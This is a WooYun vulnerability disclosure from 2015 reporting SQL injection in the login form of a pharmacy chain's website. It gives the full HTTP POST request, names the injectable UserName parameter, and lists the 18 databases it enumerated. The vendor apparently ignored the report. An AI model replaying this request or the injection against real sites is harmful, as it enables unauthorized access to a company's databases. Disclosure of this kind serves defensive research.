当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136389

漏洞标题:和平药房某站点SQL注射(涉及18库)

相关厂商:hp1997.com

漏洞作者: 路人甲

提交时间:2015-08-26 15:54

修复时间:2015-08-31 15:56

公开时间:2015-08-31 15:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-26: 细节已通知厂商并且等待厂商处理中
2015-08-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL

详细说明:

POST注入

POST /Menu.aspx HTTP/1.1
Host: www.cqpds.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: http://www.cqpds.com/Menu.aspx
Content-Length: 4502
Cookie: ASP.NET_SessionId=lxrrndebrw1f3x45av3zo2v2
Connection: keep-alive
Pragma: no-cache
ctl00%24ScriptManager1=ctl00%24ContentPlaceHolder1%24UpdatePanel_Tree%7Cctl00%24ContentPlaceHolder1%24Login1%24LoginButton&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE1MTkwMTg4MzIPZBYCZg9kFgICAw9kFhICAw8PFgIeF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naGQWAmYPDxYCHwBoZGQCBQ8PFgQeBkhlaWdodBsAAAAAAABOQAEAAAAeBF8hU0ICgAFkFgICAQ8PFgweCEltYWdlVXJsBSEvQXBwX1RoZW1lcy9PcmFuZ2UvUGljL1dlYl8wMy5naWYeBVdpZHRoGwAAAAAAIG1AAQAAAB8BGwAAAAAAAE5AAQAAAB4LQm9yZGVyV2lkdGgbAAAAAAAAAAABAAAAHgtCb3JkZXJTdHlsZQsqJVN5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuQm9yZGVyU3R5bGUAHwIC4ANkZAIHDw8WBB4IQ3NzQ2xhc3MFD2Rpdl9tZW51X2ZvcndhZB8CAgJkZAIJDw8WBB4JQmFja0NvbG9yCgAfAgIIZBYCAgEPFCsAAhQrAAIPFgIfAGhkEBYEZgIBAgICAxYEFCsAAg8WCh4FVmFsdWUFAjAxHgRUZXh0BQbpppbpobUeC05hdmlnYXRlVXJsBQlNZW51LmFzcHgfBwUKTWVudV9GcmlzdB8CAgJkZBQrAAIPFgofCQUCMDIfCgUG5paw6Ze7HwsFCU5ld3MuYXNweB8HBQlNZW51X2l0ZW0fAgICZGQUKwACDxYKHwkFAjAzHwoFEumhvuWuouiHquWKqeacjeWKoR8LZR8HBQlNZW51X2l0ZW0fAgICZA8UKwADFCsAAg8WCh8JBQQwMzAxHwoFEuS8muWRmOenr%2BWIhuafpeivoh8LBRpDdF9RdWVyeS5hc3B4P3dpbmRvdz0xMDA1MR8HBQtSYWRNZW51SXRlbR8CAgJkZBQrAAIPFgofCQUEMDMwMh8KBRXmj5DotKfljaHplIDllK7mmI7nu4YfC2UfBwUQUmFkTWVudUl0ZW1fTGFzdB8CAgJkZBQrAAIPFgofCQUEMDMwMx8KBQzlk4Hnp43mn6Xor6IfCwUaQ3RfUXVlcnkuYXNweD93aW5kb3c9MTAwNTMfBwUQUmFkTWVudUl0ZW1fTGFzdB8CAgJkZA8UKwEDZmZmFgEFc1RlbGVyaWsuV2ViLlVJLlJhZE1lbnVJdGVtLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDA4LjEuNDE1LjM1LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTU3OThiNjMwZTAyZDc0ZmMUKwACDxYKHwkFAjA0HwoFCeeVmeiogOadvx8LBQxOb3RlcGFkLmFzcHgfBwUJTWVudV9pdGVtHwICAmRkDxYEZmZmZhYBBXNUZWxlcmlrLldlYi5VSS5SYWRNZW51SXRlbSwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAwOC4xLjQxNS4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj01Nzk4YjYzMGUwMmQ3NGZjZBYIZg8PFgofCQUCMDEfCgUG6aaW6aG1HwsFCU1lbnUuYXNweB8HBQpNZW51X0ZyaXN0HwICAmRkAgEPDxYKHwkFAjAyHwoFBuaWsOmXux8LBQlOZXdzLmFzcHgfBwUJTWVudV9pdGVtHwICAmRkAgIPDxYKHwkFAjAzHwoFEumhvuWuouiHquWKqeacjeWKoR8LZR8HBQlNZW51X2l0ZW0fAgICZBYGZg8PFgofCQUEMDMwMR8KBRLkvJrlkZjnp6%2FliIbmn6Xor6IfCwUaQ3RfUXVlcnkuYXNweD93aW5kb3c9MTAwNTEfBwULUmFkTWVudUl0ZW0fAgICZGQCAQ8PFgofCQUEMDMwMh8KBRXmj5DotKfljaHplIDllK7mmI7nu4YfC2UfBwUQUmFkTWVudUl0ZW1fTGFzdB8CAgJkZAICDw8WCh8JBQQwMzAzHwoFDOWTgeenjeafpeivoh8LBRpDdF9RdWVyeS5hc3B4P3dpbmRvdz0xMDA1Mx8HBRBSYWRNZW51SXRlbV9MYXN0HwICAmRkAgMPDxYKHwkFAjA0HwoFCeeVmeiogOadvx8LBQxOb3RlcGFkLmFzcHgfBwUJTWVudV9pdGVtHwICAmRkAgsPZBYIAgEPZBYCAgEPZBYCZg9kFgQCAQ9kFgJmD2QWAgIFDxAPFgYeDURhdGFUZXh0RmllbGQFCkxvZ2luVGl0bGUeDkRhdGFWYWx1ZUZpZWxkBQxMb2dpbkNsYXNzSWQeC18hRGF0YUJvdW5kZ2QQFQYS5L%2Bd5YiG5oC76YOo6IGM5ZGYEuaxn%2BWIhuaAu%2BmDqOiBjOWRmA%2Fkv53liIbkvpvplIDllYYP5rGf5YiG5L6b5bqU5ZWGEuS5neWIhuaAu%2BmDqOiBjOWRmA%2FljJfnoprkvpvlupTllYYVBgFBAUIBQwFEAUUBTRQrAwZnZ2dnZ2dkZAIDDxQrAAIUKwACFCsAAg8WAh8AaGRkZGRkAgUPDxYMHhBWaXNpYmxlU3RhdHVzYmFyaB4FVGl0bGUFDOS%2FoeaBr%2BaPkOekuh8EGwAAAAAAwHxAAQAAAB4PVmlzaWJsZVRpdGxlYmFyZx4SS2VlcEluU2NyZWVuQm91bmRzZx4RVmlzaWJsZU9uUGFnZUxvYWRoZGQCBw9kFgICAQ8PFggfAwUnL0FwcF9UaGVtZXMvT3JhbmdlL1BpYy9hZDIwMDgxMjExMDIuZ2lmHwQbAAAAAAAogEABAAAAHwEbAAAAAAAgaEABAAAAHwICgANkZAILD2QWAgIDD2QWAmYPZBYCAgEPDxYCHgdWaXNpYmxlZ2QWAgIBDw8WAh8KBTTmnKrlsIblr7nosaHlvJXnlKjorr7nva7liLDlr7nosaHnmoTlrp7kvovjgIIgOTAwMDQyZGQCEw8PFgIfCgUEMjAxNWRkAhUPDxYCHwoFDOWSjOW5s%2BiNr%2BaIv2RkAhcPDxYCHwoFjwHkupLogZTnvZHoja%2Flk4Hkv6Hmga%2FmnI3liqHorrjlj6%2For4HvvJoo5ridKS3pnZ7nu4%2FokKXmgKctMjAwOC0wMDAxIOermeeCuemCrueuse%2B8mjxhIGhyZWY9Im1haWx0bzpocHlmQG1haWwuY3FwZHMuY29tIj5ocHlmQG1haWwuY3FwZHMuY29tPC9hPmRkAhkPDxYEHwoFiwE8c2NyaXB0IHNyYz0naHR0cDovL3M3Ny5jbnp6LmNvbS9zdGF0LnBocD9pZD0xMTg1ODY3JndlYl9pZD0xMTg1ODY3JnNob3c9cGljMScgbGFuZ3VhZ2U9J0phdmFTY3JpcHQnIGNoYXJzZXQ9J2diMjMxMic%2BPC9zY3JpcHQ%2BPGJyIC8%2BPGJyIC8%2BHxRoZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgUFF2N0bDAwJFJhZFdpbmRvd01hbmFnZXIxBRBjdGwwMCRSYWRXaW5kb3cxBRJjdGwwMCRSYWRNZW51X01haW4FLGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkTG9naW4xJExvZ2luQnV0dG9uBSZjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJFJhZFRyZWVWaWV3MTKIsmx8eZTsKv2cOyN4vB0bxvfU&ctl00_RadWindow1_ClientState=&ctl00_RadWindowManager1_ClientState=&ctl00_RadMenu_Main_ClientState=&ctl00%24ContentPlaceHolder1%24Login1%24DropDownList_Class=A&ctl00%24ContentPlaceHolder1%24Login1%24UserName=admin&ctl00%24ContentPlaceHolder1%24Login1%24Password=111111&ctl00_ContentPlaceHolder1_RadTreeView1_ClientState=%7B%22expandedNodes%22%3A%5B%5D%2C%22collapsedNodes%22%3A%5B%5D%2C%22logEntries%22%3A%5B%5D%2C%22selectedNodes%22%3A%5B%5D%2C%22checkedNodes%22%3A%5B%5D%2C%22scrollPosition%22%3A0%7D&__ASYNCPOST=true&ctl00%24ContentPlaceHolder1%24Login1%24LoginButton.x=11&ctl00%24ContentPlaceHolder1%24Login1%24LoginButton.y=15


ctl00%24ContentPlaceHolder1%24Login1%24UserName 存在注入

1.jpg

漏洞证明:

2.jpg


available databases [18]:
[*] [\\?f9hManager!]
[*] [msdb\t]
[*] [ZH\\?81BCONV\\?81RT]
[*] [zh\\?81bTurn]
[*] [ZHDB\\?81istory]
[*] [ZHDB\t]
[*] aHDBZT000915
[*] bf
[*] BFSJ
[*] master
[*] model
[*] NetWeb
[*] tempdb
[*] UserTmp
[*] zhdbbak
[*] zhdbinfo
[*] ZHDBZT000814
[*] ZHDBZT000914


wy.jpg

修复方案:

大哥 给个礼物呗 家里穷

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-31 15:56

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无